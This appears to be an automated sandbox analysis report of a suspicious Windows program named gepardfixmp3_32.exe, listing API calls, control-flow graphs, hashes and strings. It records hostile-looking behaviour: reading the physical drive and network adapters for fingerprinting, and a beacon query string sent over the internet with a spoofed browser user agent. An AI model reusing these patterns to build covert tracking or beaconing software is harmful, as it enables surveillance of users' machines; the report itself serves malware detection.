                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C2F9DA
                                                            • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02C2F9FF
                                                            • FreeLibrary.KERNEL32(00000000), ref: 02C2FA88
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                            • String ID: GetAdaptersInfo$iphlpapi.dll
                                                            • API String ID: 514930453-3114217049
                                                            • Opcode ID: 1e19f5789fb5e37a7cc93bb305fb8fcc4b7053337b9701ab1f5c2d72fea093f7
                                                            • Instruction ID: d3537d199b580cd7b9a2deccb59fd3a17ead76816c174e5d0aae196bdafefcec
                                                            • Opcode Fuzzy Hash: 1e19f5789fb5e37a7cc93bb305fb8fcc4b7053337b9701ab1f5c2d72fea093f7
                                                            • Instruction Fuzzy Hash: 0A21D071A4022DEBDB10DBA8D8806EEBBF8EF49304F1441ADD445E7610DF709A4ACBA0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1078 2c2f8a7-2c2f8d2 CreateFileA 1079 2c2f9a3-2c2f9aa 1078->1079 1080 2c2f8d8-2c2f8ed 1078->1080 1081 2c2f8f0-2c2f912 DeviceIoControl 1080->1081 1082 2c2f914-2c2f91c 1081->1082 1083 2c2f94b-2c2f953 1081->1083 1086 2c2f925-2c2f92a 1082->1086 1087 2c2f91e-2c2f923 1082->1087 1084 2c2f955-2c2f95b call 2c337b8 1083->1084 1085 2c2f95c-2c2f95e 1083->1085 1084->1085 1089 2c2f960-2c2f963 1085->1089 1090 2c2f999-2c2f9a2 CloseHandle 1085->1090 1086->1083 1091 2c2f92c-2c2f934 1086->1091 1087->1083 1094 2c2f965-2c2f96e GetLastError 1089->1094 1095 2c2f97f-2c2f98c call 2c33b5c 1089->1095 1090->1079 1092 2c2f937-2c2f93c 1091->1092 1092->1092 1096 2c2f93e-2c2f94a call 2c2f6fa 1092->1096 1094->1090 1097 2c2f970-2c2f973 1094->1097 1095->1090 1102 2c2f98e-2c2f994 1095->1102 1096->1083 1097->1095 1100 2c2f975-2c2f97c 1097->1100 1100->1095 1102->1081
                                                            APIs
                                                            • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02C2F8C6
                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02C2F904
                                                            • GetLastError.KERNEL32 ref: 02C2F965
                                                            • CloseHandle.KERNEL32(?), ref: 02C2F99C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                            • String ID: \\.\PhysicalDrive0
                                                            • API String ID: 4026078076-1180397377
                                                            • Opcode ID: 4a944dc2ced9f042a6556536c515cdbee78f312269a12ff49baa9840fd86970c
                                                            • Instruction ID: e26ca36807ba878a90cc97f84745c352f0b03822b5060338d13dace670a0846a
                                                            • Opcode Fuzzy Hash: 4a944dc2ced9f042a6556536c515cdbee78f312269a12ff49baa9840fd86970c
                                                            • Instruction Fuzzy Hash: 4231A275D00229BBDB14EF95D894BAEBBB9EF45714F20416EE505B3640DBB05B08CBD0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1104 401a4f-401a77 CreateFileA 1105 401b45-401b4a 1104->1105 1106 401a7d-401a91 1104->1106 1107 401a98-401ac0 DeviceIoControl 1106->1107 1108 401ac2-401aca 1107->1108 1109 401af3-401afb 1107->1109 1110 401ad4-401ad9 1108->1110 1111 401acc-401ad2 1108->1111 1112 401b04-401b07 1109->1112 1113 401afd-401b03 call 402ca6 1109->1113 1110->1109 1116 401adb-401af1 call 402cc0 call 4018cc 1110->1116 1111->1109 1114 401b09-401b0c 1112->1114 1115 401b3a-401b44 CloseHandle 1112->1115 1113->1112 1118 401b27-401b34 call 402c98 1114->1118 1119 401b0e-401b17 GetLastError 1114->1119 1115->1105 1116->1109 1118->1107 1118->1115 1119->1115 1122 401b19-401b1c 1119->1122 1122->1118 1125 401b1e-401b24 1122->1125 1125->1118
                                                            APIs
                                                            • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                            • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                            • GetLastError.KERNEL32 ref: 00401B0E
                                                            • CloseHandle.KERNEL32(?), ref: 00401B3D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                            • String ID: \\.\PhysicalDrive0
                                                            • API String ID: 4026078076-1180397377
                                                            • Opcode ID: 3afb43cc3dedd2849d90584800b0b4b1cc754ecdd9339dbac4238ad8ee4012bf
                                                            • Instruction ID: fc4aaa1cf60edb7db06fdbd05dea25136cd7d186831ecbc7bbbcf924abbffa34
                                                            • Opcode Fuzzy Hash: 3afb43cc3dedd2849d90584800b0b4b1cc754ecdd9339dbac4238ad8ee4012bf
                                                            • Instruction Fuzzy Hash: 74318B71D00218EADB21AFA5CD849EFBBB9FF41750F20407AE554B32A0E7785E45CB98

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 213 2c26327-2c2632a 214 2c26375-2c2639a 213->214 215 2c2632c-2c2632e 213->215 216 2c263b7-2c263bd 214->216 217 2c2639c-2c263b5 214->217 218 2c26433-2c26445 216->218 219 2c263bf-2c263db 216->219 217->216 220 2c263e6-2c2640d 218->220 221 2c26447 218->221 222 2c264b4-2c266f1 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2c242c7 GetTickCount call 2c2605a GetVersionExA call 2c34b00 call 2c32fbc * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2c34b00 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2c32fbc * 4 QueryPerformanceCounter Sleep call 2c32fbc * 2 call 2c34b00 * 2 221->222 223 2c26449 221->223 268 2c266f4-2c266f6 222->268 223->222 269 2c266f8-2c266fd 268->269 270 2c266ff-2c26701 268->270 271 2c26708 Sleep 269->271 272 2c26703 270->272 273 2c2670e-2c26742 RtlEnterCriticalSection RtlLeaveCriticalSection 270->273 271->273 272->271 274 2c26792 273->274 275 2c26744-2c26750 273->275 277 2c26796-2c272c3 InternetOpenA 274->277 275->274 276 2c26752-2c2675f 275->276 279 2c26761-2c26765 276->279 280 2c26767-2c26768 276->280 281 2c27389-2c2738f 277->281 282 2c272c9-2c27340 InternetSetOptionA * 3 call 2c34b00 InternetOpenUrlA 277->282 283 2c2676c-2c26790 call 2c34b00 * 2 279->283 280->283 285 2c27391-2c27397 281->285 286 2c273ab-2c273b9 281->286 294 2c27382-2c27383 InternetCloseHandle 282->294 295 2c27342 282->295 283->277 290 2c27399-2c2739b 285->290 291 2c2739d-2c273aa call 2c253ec 285->291 286->268 288 2c273bf-2c273e3 call 2c34b00 call 2c2439c 286->288 288->268 306 2c273e9-2c27417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2c3234c 288->306 290->286 291->286 294->281 299 2c27346-2c2736c InternetReadFile 295->299 303 2c27377-2c2737e InternetCloseHandle 299->303 304 2c2736e-2c27375 299->304 303->294 304->299 309 2c27419-2c2742b call 2c3234c 306->309 310 2c2746d-2c27488 call 2c3234c 306->310 309->310 317 2c2742d-2c2743f call 2c3234c 309->317 315 2c27742-2c27754 call 2c3234c 310->315 316 2c2748e-2c27490 310->316 324 2c27756-2c27758 315->324 325 2c2779d-2c277af call 2c3234c 315->325 316->315 319 2c27496-2c27548 call 2c32fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2c34b00 * 5 call 2c2439c * 2 316->319 317->310 327 2c27441-2c27453 call 2c3234c 317->327 383 2c27585 319->383 384 2c2754a-2c2754c 319->384 324->325 330 2c2775a-2c27798 call 2c34b00 RtlEnterCriticalSection RtlLeaveCriticalSection 324->330 336 2c277d0-2c277e2 call 2c3234c 325->336 337 2c277b1-2c277cb call 2c261f5 call 2c26303 call 2c2640e 325->337 327->310 338 2c27455-2c27467 call 2c3234c 327->338 330->268 351 2c27b00-2c27b12 call 2c3234c 336->351 352 2c277e8-2c277ea 336->352 337->268 338->268 338->310 351->268 363 2c27b18-2c27b46 call 2c32fbc call 2c34b00 call 2c2439c 351->363 352->351 356 2c277f0-2c27807 call 2c2439c 352->356 356->268 365 2c2780d-2c278db call 2c32428 call 2c21ba7 356->365 385 2c27b48-2c27b4a call 2c2534d 363->385 386 2c27b4f-2c27b56 call 2c32f84 363->386 381 2c278e2-2c27903 RtlEnterCriticalSection 365->381 382 2c278dd call 2c2143f 365->382 389 2c27905-2c2790c 381->389 390 2c2790f-2c27973 RtlLeaveCriticalSection call 2c23c67 call 2c23d7e call 2c2833f 381->390 382->381 387 2c27589-2c275b7 call 2c32fbc call 2c34b00 call 2c2439c 383->387 384->383 391 2c2754e-2c27560 call 2c3234c 384->391 385->386 386->268 414 2c275f8-2c27601 call 2c32f84 387->414 415 2c275b9-2c275c8 call 2c335f6 387->415 389->390 412 2c27ae7-2c27afb call 2c29007 390->412 413 2c27979-2c279c1 call 2c2a729 390->413 391->383 403 2c27562-2c27583 call 2c2439c 391->403 403->387 412->268 424 2c27ab1-2c27ae2 call 2c283ee call 2c233b2 413->424 425 2c279c7-2c279ce 413->425 426 2c27607-2c2761f call 2c33b5c 414->426 427 2c27738-2c2773b 414->427 415->414 428 2c275ca 415->428 424->412 430 2c279d1-2c279d6 425->430 439 2c27621-2c27629 call 2c2973b 426->439 440 2c2762b 426->440 427->315 432 2c275cf-2c275e1 call 2c32860 428->432 430->430 434 2c279d8-2c27a23 call 2c2a729 430->434 442 2c275e3 432->442 443 2c275e6-2c275f6 call 2c335f6 432->443 434->424 448 2c27a29-2c27a2f 434->448 446 2c2762d-2c276e5 call 2c2a853 call 2c23863 call 2c25119 call 2c23863 call 2c2aaf9 call 2c2ac13 439->446 440->446 442->443 443->414 443->432 470 2c276e7 call 2c2380b 446->470 471 2c276ec-2c27717 Sleep call 2c31900 446->471 453 2c27a32-2c27a37 448->453 453->453 455 2c27a39-2c27a74 call 2c2a729 453->455 455->424 461 2c27a76-2c27ab0 call 2c2d11b 455->461 461->424 470->471 475 2c27723-2c27731 471->475 476 2c27719-2c27722 call 2c24100 471->476 475->427 478 2c27733 call 2c2380b 475->478 476->475 478->427
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                            • API String ID: 0-2678694477
                                                            • Opcode ID: bde170e79559e475814654f3c135c30b0b0d1c6d5ce111523603c13c02b63a32
                                                            • Instruction ID: 34362cb06f3a8f49fd28f4a8db8574790d7cd6d57e363b95f8a07faf36fe0b0a
                                                            • Opcode Fuzzy Hash: bde170e79559e475814654f3c135c30b0b0d1c6d5ce111523603c13c02b63a32
                                                            • Instruction Fuzzy Hash: E79114B1D493609FD711AF34AC45B9BFBE9AF89310F100C2EF98597241DB749848CB96

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 739 2c26451-2c26464 740 2c26466-2c2648a 739->740 741 2c264bb-2c264ec GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 739->741 742 2c264f3-2c266f1 GetTickCount call 2c2605a GetVersionExA call 2c34b00 call 2c32fbc * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2c34b00 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2c32fbc * 4 QueryPerformanceCounter Sleep call 2c32fbc * 2 call 2c34b00 * 2 741->742 743 2c264ee call 2c242c7 741->743 786 2c266f4-2c266f6 742->786 743->742 787 2c266f8-2c266fd 786->787 788 2c266ff-2c26701 786->788 789 2c26708 Sleep 787->789 790 2c26703 788->790 791 2c2670e-2c26742 RtlEnterCriticalSection RtlLeaveCriticalSection 788->791 789->791 790->789 792 2c26792 791->792 793 2c26744-2c26750 791->793 795 2c26796-2c272c3 InternetOpenA 792->795 793->792 794 2c26752-2c2675f 793->794 797 2c26761-2c26765 794->797 798 2c26767-2c26768 794->798 799 2c27389-2c2738f 795->799 800 2c272c9-2c27340 InternetSetOptionA * 3 call 2c34b00 InternetOpenUrlA 795->800 801 2c2676c-2c26790 call 2c34b00 * 2 797->801 798->801 803 2c27391-2c27397 799->803 804 2c273ab-2c273b9 799->804 812 2c27382-2c27383 InternetCloseHandle 800->812 813 2c27342 800->813 801->795 808 2c27399-2c2739b 803->808 809 2c2739d-2c273aa call 2c253ec 803->809 804->786 806 2c273bf-2c273e3 call 2c34b00 call 2c2439c 804->806 806->786 824 2c273e9-2c27417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2c3234c 806->824 808->804 809->804 812->799 817 2c27346-2c2736c InternetReadFile 813->817 821 2c27377-2c2737e InternetCloseHandle 817->821 822 2c2736e-2c27375 817->822 821->812 822->817 827 2c27419-2c2742b call 2c3234c 824->827 828 2c2746d-2c27488 call 2c3234c 824->828 827->828 835 2c2742d-2c2743f call 2c3234c 827->835 833 2c27742-2c27754 call 2c3234c 828->833 834 2c2748e-2c27490 828->834 842 2c27756-2c27758 833->842 843 2c2779d-2c277af call 2c3234c 833->843 834->833 837 2c27496-2c27548 call 2c32fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2c34b00 * 5 call 2c2439c * 2 834->837 835->828 845 2c27441-2c27453 call 2c3234c 835->845 901 2c27585 837->901 902 2c2754a-2c2754c 837->902 842->843 848 2c2775a-2c27798 call 2c34b00 RtlEnterCriticalSection RtlLeaveCriticalSection 842->848 854 2c277d0-2c277e2 call 2c3234c 843->854 855 2c277b1-2c277cb call 2c261f5 call 2c26303 call 2c2640e 843->855 845->828 856 2c27455-2c27467 call 2c3234c 845->856 848->786 869 2c27b00-2c27b12 call 2c3234c 854->869 870 2c277e8-2c277ea 854->870 855->786 856->786 856->828 869->786 881 2c27b18-2c27b46 call 2c32fbc call 2c34b00 call 2c2439c 869->881 870->869 874 2c277f0-2c27807 call 2c2439c 870->874 874->786 883 2c2780d-2c278db call 2c32428 call 2c21ba7 874->883 903 2c27b48-2c27b4a call 2c2534d 881->903 904 2c27b4f-2c27b56 call 2c32f84 881->904 899 2c278e2-2c27903 RtlEnterCriticalSection 883->899 900 2c278dd call 2c2143f 883->900 907 2c27905-2c2790c 899->907 908 2c2790f-2c27973 RtlLeaveCriticalSection call 2c23c67 call 2c23d7e call 2c2833f 899->908 900->899 905 2c27589-2c275b7 call 2c32fbc call 2c34b00 call 2c2439c 901->905 902->901 909 2c2754e-2c27560 call 2c3234c 902->909 903->904 904->786 932 2c275f8-2c27601 call 2c32f84 905->932 933 2c275b9-2c275c8 call 2c335f6 905->933 907->908 930 2c27ae7-2c27afb call 2c29007 908->930 931 2c27979-2c279c1 call 2c2a729 908->931 909->901 921 2c27562-2c27583 call 2c2439c 909->921 921->905 930->786 942 2c27ab1-2c27ae2 call 2c283ee call 2c233b2 931->942 943 2c279c7-2c279ce 931->943 944 2c27607-2c2761f call 2c33b5c 932->944 945 2c27738-2c2773b 932->945 933->932 946 2c275ca 933->946 942->930 948 2c279d1-2c279d6 943->948 957 2c27621-2c27629 call 2c2973b 944->957 958 2c2762b 944->958 945->833 950 2c275cf-2c275e1 call 2c32860 946->950 948->948 952 2c279d8-2c27a23 call 2c2a729 948->952 960 2c275e3 950->960 961 2c275e6-2c275f6 call 2c335f6 950->961 952->942 966 2c27a29-2c27a2f 952->966 964 2c2762d-2c276e5 call 2c2a853 call 2c23863 call 2c25119 call 2c23863 call 2c2aaf9 call 2c2ac13 957->964 958->964 960->961 961->932 961->950 988 2c276e7 call 2c2380b 964->988 989 2c276ec-2c27717 Sleep call 2c31900 964->989 971 2c27a32-2c27a37 966->971 971->971 973 2c27a39-2c27a74 call 2c2a729 971->973 973->942 979 2c27a76-2c27ab0 call 2c2d11b 973->979 979->942 988->989 993 2c27723-2c27731 989->993 994 2c27719-2c27722 call 2c24100 989->994 993->945 996 2c27733 call 2c2380b 993->996 994->993 996->945
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _malloc$Heap$AllocateProcess_memset$AddressHandleModuleProc$CountTickVersion
                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                            • API String ID: 3591513442-2678694477
                                                            • Opcode ID: db28076c0160c8758344c079e4666fe5df595d940918f9ffd409cd49eb31b40f
                                                            • Instruction ID: a8b9506250ed29800f775d6af948dd63436f0df2292d480013e31d3b036386a3
                                                            • Opcode Fuzzy Hash: db28076c0160c8758344c079e4666fe5df595d940918f9ffd409cd49eb31b40f
                                                            • Instruction Fuzzy Hash: F871C0B5D453609FE710AB74AC45B5BBBE9AF89310F110C2EF984D7240DBB49848CB96

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1025 401f64-401f84 FindResourceA 1026 401f86-401f9d GetLastError SizeofResource 1025->1026 1027 401f9f-401fa1 1025->1027 1026->1027 1028 401fa6-401fec LoadResource LockResource GlobalAlloc call 402900 * 2 1026->1028 1029 402096-40209a 1027->1029 1034 401fee-401ff9 1028->1034 1034->1034 1035 401ffb-402003 GetTickCount 1034->1035 1036 402032-402038 1035->1036 1037 402005-402007 1035->1037 1038 402053-402083 GlobalAlloc call 401c26 1036->1038 1039 40203a-40204a 1036->1039 1037->1038 1040 402009-40200f 1037->1040 1047 402088-402093 1038->1047 1042 40204c 1039->1042 1043 40204e-402051 1039->1043 1040->1038 1041 402011-402023 1040->1041 1045 402025 1041->1045 1046 402027-40202a 1041->1046 1042->1043 1043->1038 1043->1039 1045->1046 1046->1041 1048 40202c-40202e 1046->1048 1047->1029 1048->1040 1049 402030 1048->1049 1049->1038
                                                            APIs
                                                            • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                            • GetLastError.KERNEL32 ref: 00401F86
                                                            • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                            • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                            • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                            • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                            • GetTickCount.KERNEL32 ref: 00401FFB
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                            • String ID:
                                                            • API String ID: 564119183-0
                                                            • Opcode ID: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                            • Instruction ID: 5f40b5bb2c798fd06435bc38b1d437300a77b6e6fc54339f6675bf13ecd45336
                                                            • Opcode Fuzzy Hash: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                            • Instruction Fuzzy Hash: 45314E71A00255AFDB105FB59F8896F7F68EF45344F10807AFE86F7281DA748845C7A8

                                                            Control-flow Graph

                                                            APIs
                                                            • GetVersion.KERNEL32 ref: 00402ED6
                                                              • Part of subcall function 00403FF4: HeapCreate.KERNEL32(00000000,00001000,00000000,00402F0F,00000000), ref: 00404005
                                                              • Part of subcall function 00403FF4: HeapDestroy.KERNEL32 ref: 00404044
                                                            • GetCommandLineA.KERNEL32 ref: 00402F24
                                                            • GetStartupInfoA.KERNEL32(?), ref: 00402F4F
                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402F72
                                                              • Part of subcall function 00402FCB: ExitProcess.KERNEL32 ref: 00402FE8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                            • String ID: Y
                                                            • API String ID: 2057626494-4136946213
                                                            • Opcode ID: bde1f74d60b81ae7252d13bfcbc661632079e5aa7379041ec1857b7291440294
                                                            • Instruction ID: ae24bdd31f92ba5c0019e7eb98566f973638ce5b9b082510a96f2684413349a7
                                                            • Opcode Fuzzy Hash: bde1f74d60b81ae7252d13bfcbc661632079e5aa7379041ec1857b7291440294
                                                            • Instruction Fuzzy Hash: 3721A1B1840615ABDB14AFA6DE4AA6E7FB8EF44705F10413FF501B72D1DB384500CB58

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1157 4027be-40d5c4 GetModuleFileNameA
                                                            APIs
                                                            • RegQueryValueExA.KERNEL32(?,Common AppData), ref: 0040D4C2
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe,00000104), ref: 0040D5BE
                                                            Strings
                                                            • Epic Project Studio 10.4.46, xrefs: 0040D5C4
                                                            • C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe, xrefs: 0040D502
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: FileModuleNameQueryValue
                                                            • String ID: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe$Epic Project Studio 10.4.46
                                                            • API String ID: 796600691-3732494730
                                                            • Opcode ID: 1f5c9e5d19319d9e98d7ef49cab009aba141d907048be9017dadab67c9d56fd9
                                                            • Instruction ID: e12dd9ff806935ce77d9154c21458074b731eb7d3c747ac1418e28eb6b52cf0f
                                                            • Opcode Fuzzy Hash: 1f5c9e5d19319d9e98d7ef49cab009aba141d907048be9017dadab67c9d56fd9
                                                            • Instruction Fuzzy Hash: C9E048B1555701EFD3804BF08E4CB6577A86B14315B1156379B47F60D1D6BC900A971F

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1162 2c21aa9-2c21ac3 InterlockedIncrement 1163 2c21ac5-2c21ad7 WSAStartup InterlockedExchange 1162->1163 1164 2c21add-2c21ae0 1162->1164 1163->1164
                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(02C572B4), ref: 02C21ABA
                                                            • WSAStartup.WS2_32(00000002,00000000), ref: 02C21ACB
                                                            • InterlockedExchange.KERNEL32(02C572B8,00000000), ref: 02C21AD7
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked$ExchangeIncrementStartup
                                                            • String ID:
                                                            • API String ID: 1856147945-0
                                                            • Opcode ID: d00ae5eaa631359df8404744094cb3538dccbd62fa156f4fe606cf6f52107d76
                                                            • Instruction ID: 7f8965c4980e1695a1a97950a86b321cbf277261a8233467be6ce5cba210b566
                                                            • Opcode Fuzzy Hash: d00ae5eaa631359df8404744094cb3538dccbd62fa156f4fe606cf6f52107d76
                                                            • Instruction Fuzzy Hash: B2D05E759912259BE21066A4AC4EB7AF7ACE706611F000B61FC6EC04C0EB51A66C85FA

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCommandLineW.KERNEL32 ref: 0040D1C5
                                                            • CommandLineToArgvW.SHELL32(00000000), ref: 0040D84E
                                                            • GetLocalTime.KERNEL32(0040C2B8), ref: 0040D85F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: CommandLine$ArgvLocalTime
                                                            • String ID:
                                                            • API String ID: 3768950922-0
                                                            • Opcode ID: 77b36094ec17ab9f70ec50e238d20ee10b593bd2acb85155a30d224334729c29
                                                            • Instruction ID: 6d05e74e3aafd66fead3f72cd2ff8d5b774e297a2d0df4f3b5c226aa3b6f3a05
                                                            • Opcode Fuzzy Hash: 77b36094ec17ab9f70ec50e238d20ee10b593bd2acb85155a30d224334729c29
                                                            • Instruction Fuzzy Hash: BDD09E71C14202EFC6003BF0AF0945936A97A19345311097EE157F60A0CF38544A9B2E

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1170 4027d5-40d4c8 RegQueryValueExA
                                                            APIs
                                                            • RegQueryValueExA.KERNEL32(?,Common AppData), ref: 0040D4C2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: QueryValue
                                                            • String ID: Common AppData
                                                            • API String ID: 3660427363-2574214464
                                                            • Opcode ID: 5a732c1f420c91e7419a92f6b7df212ca783e0400e4cff93e1334a1a3c779974
                                                            • Instruction ID: be4477b60b661d5b1cb7cc7df3538f651c35a875ce78c49c2debf303342c9baa
                                                            • Opcode Fuzzy Hash: 5a732c1f420c91e7419a92f6b7df212ca783e0400e4cff93e1334a1a3c779974
                                                            • Instruction Fuzzy Hash: 6DC04C70A54915EADB115FA04E48A6A7A74BA40741731853AA452710D0D7F85909662E

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1173 4021a7-40da97 RegCreateKeyExA
                                                            APIs
                                                            • RegCreateKeyExA.KERNEL32(80000002,Software\SmallTour), ref: 0040DA91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID: Software\SmallTour
                                                            • API String ID: 2289755597-3113880327
                                                            • Opcode ID: 9f61a6a334e6a0608209747088f42285cd70d14eb22b251fddcc9957a14c149b
                                                            • Instruction ID: b43e9ac74aaeff2d43563ad987be13444be3105c4fa756f1369de9586028f592
                                                            • Opcode Fuzzy Hash: 9f61a6a334e6a0608209747088f42285cd70d14eb22b251fddcc9957a14c149b
